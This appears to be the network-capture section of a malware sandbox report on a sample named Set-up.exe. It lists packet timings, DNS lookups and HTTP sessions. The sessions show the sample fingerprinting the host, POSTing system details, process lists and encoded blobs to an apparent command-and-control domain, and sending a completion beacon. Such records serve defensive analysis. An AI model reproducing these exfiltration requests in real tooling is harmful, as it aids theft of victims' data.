                                                                                                                                                                    Dec 28, 2024 09:30:08.161216974 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.161248922 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.203336000 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.205302000 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.205365896 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.205380917 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.247342110 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.249500990 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.249550104 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.249579906 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.291356087 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.297224998 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:08.339339018 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:08.902776957 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:12.197660923 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:12.197772980 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:12.197840929 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:12.261909008 CET49818443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:12.261928082 CET44349818172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:12.351217031 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:12.351267099 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:12.351353884 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:12.356385946 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:12.356400013 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:13.613924026 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:13.613991022 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:13.615340948 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:13.615350962 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:13.615638971 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:13.616995096 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:13.617012024 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:13.617064953 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.479001045 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.479093075 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.479119062 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.479147911 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.479166031 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:14.479181051 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.479192019 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:14.487356901 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.487390995 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.487430096 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:14.487442970 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.487489939 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:14.495790005 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.508339882 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.508374929 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.508388996 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:14.508405924 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.508444071 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:14.508449078 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.508479118 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.508519888 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:14.508646011 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:14.508663893 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:30:14.508675098 CET49830443192.168.2.5172.67.128.184
                                                                                                                                                                    Dec 28, 2024 09:30:14.508681059 CET44349830172.67.128.184192.168.2.5
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 28, 2024 09:29:28.131145000 CET5071553192.168.2.51.1.1.1
                                                                                                                                                                    Dec 28, 2024 09:29:28.132973909 CET5071553192.168.2.51.1.1.1
                                                                                                                                                                    Dec 28, 2024 09:29:28.416965008 CET53507151.1.1.1192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:28.422358036 CET53507151.1.1.1192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:37.333626032 CET5234853192.168.2.51.1.1.1
                                                                                                                                                                    Dec 28, 2024 09:29:37.560092926 CET53523481.1.1.1192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:46.054995060 CET6274253192.168.2.51.1.1.1
                                                                                                                                                                    Dec 28, 2024 09:29:46.055046082 CET6274253192.168.2.51.1.1.1
                                                                                                                                                                    Dec 28, 2024 09:29:46.689701080 CET53627421.1.1.1192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:46.689830065 CET53627421.1.1.1192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:50.832350016 CET6534353192.168.2.51.1.1.1
                                                                                                                                                                    Dec 28, 2024 09:29:50.832389116 CET6534353192.168.2.51.1.1.1
                                                                                                                                                                    Dec 28, 2024 09:29:50.972302914 CET53653431.1.1.1192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:50.972537994 CET53653431.1.1.1192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:51.040426970 CET5036453192.168.2.51.1.1.1
                                                                                                                                                                    Dec 28, 2024 09:29:51.353657007 CET53503641.1.1.1192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.557344913 CET5036553192.168.2.51.1.1.1
                                                                                                                                                                    Dec 28, 2024 09:29:52.557377100 CET5036553192.168.2.51.1.1.1
                                                                                                                                                                    Dec 28, 2024 09:29:52.696580887 CET53503651.1.1.1192.168.2.5
                                                                                                                                                                    Dec 28, 2024 09:29:52.696949005 CET53503651.1.1.1192.168.2.5
                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 28, 2024 09:29:28.131145000 CET192.168.2.51.1.1.10xffbdStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:28.132973909 CET192.168.2.51.1.1.10x1381Standard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:37.333626032 CET192.168.2.51.1.1.10x4a2bStandard query (0)yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVnA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:46.054995060 CET192.168.2.51.1.1.10x849eStandard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:46.055046082 CET192.168.2.51.1.1.10xc5c1Standard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:50.832350016 CET192.168.2.51.1.1.10x20d7Standard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:50.832389116 CET192.168.2.51.1.1.10x9dffStandard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:51.040426970 CET192.168.2.51.1.1.10x85beStandard query (0)spuriotis.clickA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:52.557344913 CET192.168.2.51.1.1.10xf286Standard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:52.557377100 CET192.168.2.51.1.1.10x190Standard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 28, 2024 09:29:28.416965008 CET1.1.1.1192.168.2.50xffbdNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:28.416965008 CET1.1.1.1192.168.2.50xffbdNo error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:37.560092926 CET1.1.1.1192.168.2.50x4a2bName error (3)yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:46.689830065 CET1.1.1.1192.168.2.50x849eNo error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:50.972537994 CET1.1.1.1192.168.2.50x20d7No error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:51.353657007 CET1.1.1.1192.168.2.50x85beNo error (0)spuriotis.click172.67.128.184A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:51.353657007 CET1.1.1.1192.168.2.50x85beNo error (0)spuriotis.click104.21.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 28, 2024 09:29:52.696949005 CET1.1.1.1192.168.2.50xf286No error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                    • httpbin.org
                                                                                                                                                                    • spuriotis.click
                                                                                                                                                                    • home.fortth14ht.top
                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.549762194.87.58.92804352C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 28, 2024 09:29:46.812155008 CET12360OUTPOST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1
                                                                                                                                                                    Host: home.fortth14ht.top
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                    Content-Length: 514003
                                                                                                                                                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 35 34 39 38 30 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                                                                                                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241957549801", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
                                                                                                                                                                    Dec 28, 2024 09:29:46.933818102 CET7416OUTData Raw: 55 58 78 5a 70 31 74 44 41 32 6f 70 5a 32 78 30 32 38 75 4a 72 61 36 6e 76 30 6b 74 76 35 73 2b 6b 6c 39 49 53 58 67 46 6b 33 43 6d 49 77 48 42 7a 34 32 7a 37 6a 44 4f 38 56 6c 57 57 5a 58 58 34 67 5c 2f 77 42 56 73 72 77 2b 48 79 33 4c 71 32 5a
                                                                                                                                                                    Data Ascii: UXxZp1tDA2opZ2x028uJra6nv0ktv5s+kl9ISXgFk3CmIwHBz42z7jDO8VlWWZXX4g\/wBVsrw+Hy3Lq2ZZlmGZZ3DJeI8TRjRpxoUMNhsLkeNq4rEYmKlLDUadStH+5voTfQ8yz6WOa+KOK4t8VMR4ScA+EnCeT8QcQ5\/k\/AcfEzivM8y4m4iwnDfDnD\/DfB2J4z8O8rxdTFYirjcdmWZZtxtkmEyzL8tqypRzDG4jC4Kr+
                                                                                                                                                                    Dec 28, 2024 09:29:46.933868885 CET9888OUTData Raw: 4f 49 34 59 58 6a 48 68 4c 44 34 47 57 61 5a 67 38 6d 6e 6d 75 59 63 53 34 4c 49 73 4e 69 63 7a 71 59 4c 4c 63 56 67 59 34 50 43 54 7a 48 43 59 4b 6e 57 6c 43 64 54 46 56 6f 34 69 68 43 74 47 4e 53 65 44 77 32 50 65 47 6a 55 78 45 73 50 43 72 5c
                                                                                                                                                                    Data Ascii: OI4YXjHhLD4GWaZg8mnmuYcS4LIsNiczqYLLcVgY4PCTzHCYKnWlCdTFVo4ihCtGNSeDw2PeGjUxEsPCr\/ALy+A3hLic58A\/HPNOJKXBvCsOPqHBHDHhFxD4lZrlXB2F4h4syfiWWf55h+FM84hxOX0cThsPkmBrZZmeIy+pVwlDPs34Xp5tWw2V080xOE\/p8r+P7\/AIK0\/DDwh8MP+ChWo3PgvTLfRIfi38BfDXxX8X6f
                                                                                                                                                                    Dec 28, 2024 09:29:46.933933020 CET4944OUTData Raw: 5c 2f 67 4c 78 44 5c 2f 77 77 6c 38 41 74 4c 5c 2f 34 56 76 34 71 74 5c 2f 48 33 67 6a 78 44 65 2b 4d 76 37 4a 74 50 45 62 32 66 6a 44 2b 30 50 41 32 68 65 4d 5c 2f 68 33 5c 2f 77 6a 32 73 76 42 70 74 70 5c 2f 77 6e 6e 5c 2f 41 41 6c 73 4d 72 61
                                                                                                                                                                    Data Ascii: \/gLxD\/wwl8AtL\/4Vv4qt\/H3gjxDe+Mv7JtPEb2fjD+0PA2heM\/h3\/wj2svBptp\/wnn\/AAlsMrax4X0qCb1f4H\/8Ey\/2Hv2cPiRonxd+DXwNt\/CPxE8OW+r22heI5viB8VfFEmlx67pN5oWrNaad4w8c+INHS4vNH1C\/05rv+zzdRWt5cxwTRCaTd94V8pleXVMHhpUq805uvUqp0KtaMeWdOlC0reycmvZtq6fL
                                                                                                                                                                    Dec 28, 2024 09:29:46.933959007 CET2472OUTData Raw: 75 59 34 57 53 6c 68 38 79 79 75 74 6a 73 75 78 75 48 6d 32 72 4f 6a 6a 4d 4a 4b 6a 58 6f 79 62 35 62 4f 46 53 4c 62 74 62 6f 66 61 33 68 6e 39 74 50 34 74 61 4a 70 30 2b 6c 61 74 64 52 2b 4a 4c 43 65 31 6b 74 6d 53 39 6b 45 63 32 48 51 6f 48 2b
                                                                                                                                                                    Data Ascii: uY4WSlh8yyutjsuxuHm2rOjjMJKjXoyb5bOFSLbtbofa3hn9tP4taJp0+latdR+JLCe1ktmS9kEc2HQoH+0TwX7R+XnKxWq2sIA2mMjbt8M8UfFnxh4teVb\/AFO4isZC2NPjmaC0CnorwwCGCYgHaJJId+M5bLNu8m0DUtJ8U+Mvh\/4D0TxD4XbxD8S\/iD4L+GnhoX+uRQaePEfjvX7Hw3ojajNp8Gq30Nguo6hA15LZ6Zf3
                                                                                                                                                                    Dec 28, 2024 09:29:47.053551912 CET2472OUTData Raw: 33 4a 36 2b 56 56 4d 76 7a 72 44 5a 68 68 63 72 6a 6a 4a 59 36 74 51 78 57 55 59 7a 47 34 64 71 68 5c 2f 5a 32 4f 68 61 56 57 4d 71 6c 58 43 59 69 6a 52 6a 55 71 30 70 77 58 51 55 56 59 30 65 58 77 54 34 71 2b 49 48 67 76 34 66 2b 42 76 32 67 66
                                                                                                                                                                    Data Ascii: 3J6+VVMvzrDZhhcrjjJY6tQxWUYzG4dqh\/Z2OhaVWMqlXCYijRjUq0pwXQUVY0eXwT4q+IHgv4f+Bv2gf2dfHEviu1+Jt\/q3iXQfEfxph8OeAtO+E\/w48V\/FTxTqfiMa78AdG8QeJtIPhXwT4lbTta+EWgfE7RbjUbG1tZtRto9a0G51Rhbw0rxa8Piz8HJ\/gxN8Fbb9oCP9pGy1j4n3vwZ\/4VtefEn\/AIUvBdtZwfCE
                                                                                                                                                                    Dec 28, 2024 09:29:47.053589106 CET4944OUTData Raw: 32 41 31 2b 66 34 6e 2b 4a 4e 4f 6c 73 37 56 64 55 66 54 5a 66 44 66 6e 33 73 2b 72 57 32 72 4a 46 6f 6b 33 73 58 78 48 30 54 51 76 68 76 34 36 38 52 66 44 49 5c 2f 46 7a 34 51 66 45 4c 78 5c 2f 77 43 43 50 46 6d 6f 2b 43 76 69 46 34 53 2b 47 30
                                                                                                                                                                    Data Ascii: 2A1+f4n+JNOls7VdUfTZfDfn3s+rW2rJFok3sXxH0TQvhv468RfDI\/Fz4QfELx\/wCCPFmo+CviF4S+G0vxon1LwJr+lB0vbbWtS+IvwQ+GvhTU447mOSzWbwh4l8TK88bPgWhS5f8AsPLvFnw6zjOqfDuVcVYDMc7qYzNcBHLsFTxmJrxxWR4pYHN4VPZYaUKMMuxko4XFV6s4YelXlCm6vNKKf+beZeB\/ivkXDk+Lc64LzP
                                                                                                                                                                    Dec 28, 2024 09:29:47.053750992 CET4944OUTData Raw: 76 34 55 62 6e 61 4a 30 52 4e 38 6e 5c 2f 4c 58 5c 2f 72 33 39 5c 2f 77 44 50 65 74 50 5a 2b 66 34 66 38 45 32 39 5c 2f 77 44 75 5c 2f 69 48 6c 79 48 72 39 5c 2f 77 44 35 36 66 68 5c 2f 79 39 34 36 63 31 44 35 6e 79 76 76 66 65 5c 2f 5c 2f 41 43
                                                                                                                                                                    Data Ascii: v4UbnaJ0RN8n\/LX\/r39\/wDPetPZ+f4f8E29\/wDu\/iHlyHr9\/wD56fh\/y946c1D5nyvvfe\/\/ACxkcf6n\/J70EorN5Pl\/9c5P+Ww+v86nxIv9+FP9aI\/N8\/8A0f8ApVe\/\/d\/Eogk\/ec\/8th9ol\/54f8vX4df5fiKZ5eWfyfk\/35fXn\/P+FTfJ5iMnyfu\/+Wn+vit+f\/r\/AE9qhkXzW37I3zGf3cmf
                                                                                                                                                                    Dec 28, 2024 09:29:47.053788900 CET2472OUTData Raw: 5a 72 69 65 48 65 45 38 6c 79 6e 44 59 33 44 38 49 59 66 4c 4d 42 37 58 47 34 76 43 35 42 48 67 32 72 52 6a 6c 56 66 4c 49 5a 6a 69 63 77 68 54 78 46 4c 41 55 35 59 43 50 75 52 77 63 36 64 61 74 58 72 34 4b 76 6a 61 6b 73 55 5c 2f 6b 76 77 45 50
                                                                                                                                                                    Data Ascii: ZrieHeE8lynDY3D8IYfLMB7XG4vC5BHg2rRjlVfLIZjicwhTxFLAU5YCPuRwc6datXr4KvjaksU\/kvwEP2cv2V\/HnwI1d\/ib8D\/j9o3hvwD+1p4Ov5fBfw7\/aq0jTtYh8efss\/GT4c+B9H+JFtr3w3+Dvj7Rn+JHjLxf4V8JXdn8ONR1w6Fp+reIdX1D4keEIdF0\/XdS8r8F6R8UbjX\/APxFX4l\/s3fsQ6H4C\/Zrv
                                                                                                                                                                    Dec 28, 2024 09:29:47.097618103 CET27192OUTData Raw: 4d 6c 6f 4d 34 74 58 73 37 64 37 63 5a 41 42 78 41 30 5a 69 47 51 41 44 68 65 51 42 36 55 5a 58 39 43 5c 2f 68 54 41 34 54 4d 61 47 4b 34 6b 7a 54 48 31 63 5a 77 5c 2f 6a 4d 6a 77 39 61 70 68 38 48 53 2b 6f 7a 78 65 55 38 4e 5a 46 39 66 6f 51 6f
                                                                                                                                                                    Data Ascii: MloM4tXs7d7cZABxA0ZiGQADheQB6UZX9C\/hTA4TMaGK4kzTH1cZw\/jMjw9aph8HS+ozxeU8NZF9foQoUKUFiaOU8L4DDU5KEed1sbPEe3+tTiaZx+0C41zHGZbiMHwlk2W0cHxTgOJcXQpYvMav9ovA4\/iHN1gMROviatSWGrZrxHicVUpznUjBYPLqWHVCOFin+aH7QvjPwlpfwc8afAbwh4jPxJ0jwN\/wTK0z9nnwz8T
                                                                                                                                                                    Dec 28, 2024 09:29:47.217289925 CET8652OUTData Raw: 38 41 6c 78 6c 34 61 5a 6c 77 52 53 6f 35 7a 34 6e 35 46 6d 6d 54 5a 62 57 6e 68 76 37 4b 77 74 56 78 69 38 37 39 72 52 78 57 4a 61 77 38 38 4c 4b 76 4b 64 4e 77 77 30 49 51 6e 4b 70 67 38 4e 4a 56 33 57 65 4f 5c 2f 63 4c 43 34 72 5c 2f 30 4f 63
                                                                                                                                                                    Data Ascii: 8Alxl4aZlwRSo5z4n5FmmTZbWnhv7KwtVxi879rRxWJaw88LKvKdNww0IQnKpg8NJV3WeO\/cLC4r\/0Ocw+k5l\/jZi\/9Qvoq8XZJxLxXPLc1xvEOeYnK8ywlHgvBYXH5FlVLHYilxLhcnozSr53VxFb6jhOI8yhLLoYCnw+45nLOcm+t\/8AgoF\/wVt\/YV+Avx1+FPws+Ff7PfxD+NHjL\/gn3f3Xgv4R3vh742ax8Fvgf
                                                                                                                                                                    Dec 28, 2024 09:29:50.812779903 CET157INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:29:50 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Content-Length: 1
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 30
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.549773194.87.58.92804352C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 28, 2024 09:29:51.093384981 CET99OUTGET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1
                                                                                                                                                                    Host: home.fortth14ht.top
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Dec 28, 2024 09:29:52.549942970 CET372INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:29:52 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Content-Length: 207
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.549779194.87.58.92804352C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 28, 2024 09:29:52.818582058 CET172OUTPOST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1
                                                                                                                                                                    Host: home.fortth14ht.top
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                    Content-Length: 31
                                                                                                                                                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                                                                                                                                    Data Ascii: { "id1": "0", "data": "Done1" }
                                                                                                                                                                    Dec 28, 2024 09:29:54.462794065 CET372INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                    Server: nginx/1.22.1
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:29:54 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Content-Length: 207
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.54971934.226.108.1554434352C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-28 08:29:30 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                    Host: httpbin.org
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    2024-12-28 08:29:31 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:29:30 GMT
                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                    Content-Length: 31
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Server: gunicorn/19.9.0
                                                                                                                                                                    Access-Control-Allow-Origin: *
